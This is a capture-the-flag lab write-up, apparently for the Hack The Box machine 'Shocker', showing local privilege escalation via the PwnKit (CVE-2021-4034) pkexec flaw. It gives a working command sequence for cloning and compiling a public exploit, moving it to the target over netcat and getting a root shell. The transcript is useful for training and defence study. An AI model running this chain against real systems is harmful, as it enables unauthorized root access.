InfoSec LAB

Shocker_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit)

I found an exploit online

shelly@Shocker:/dev/shm$ gcc
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ make
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ cc
bash: /usr/bin/python: No such file or directory

Local compilation is not available. Opting out to remote compilation.

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ docker run -it --entrypoint "/bin/bash" --name shocker  ubuntu:16.04
root@f62cf0dcc337:/# apt update -y ; apt install net-tools netcat gcc gcc-multilib nano git make wget -y

Setting up the environment

root@f62cf0dcc337:/# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.
Checking connectivity... done.

Downloading the exploit

root@f62cf0dcc337:/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.
root@f62cf0dcc337:/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

Compile & package

Exploitation

root@f62cf0dcc337:/# nc 10.10.10.56 3333 < CVE-2021-4034.tar.gz
 
shelly@Shocker:/dev/shm$ nc -nlvp 3333 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 3333)
Connection from [10.10.14.2] port 3333 [tcp/*] accepted (family 2, sport 47406)
shelly@Shocker:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

shelly@Shocker:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
Shocker
# ifconfig
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:89:cf  
          inet addr:10.10.10.56  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:89cf/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:89cf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12218 errors:0 dropped:20 overruns:0 frame:0
          TX packets:9076 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:14850998 (14.8 MB)  TX bytes:1675313 (1.6 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:19568 errors:0 dropped:0 overruns:0 frame:0
          TX packets:19568 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1449756 (1.4 MB)  TX bytes:1449756 (1.4 MB)

System Level Compromise

Interactive Graph View

Backlinks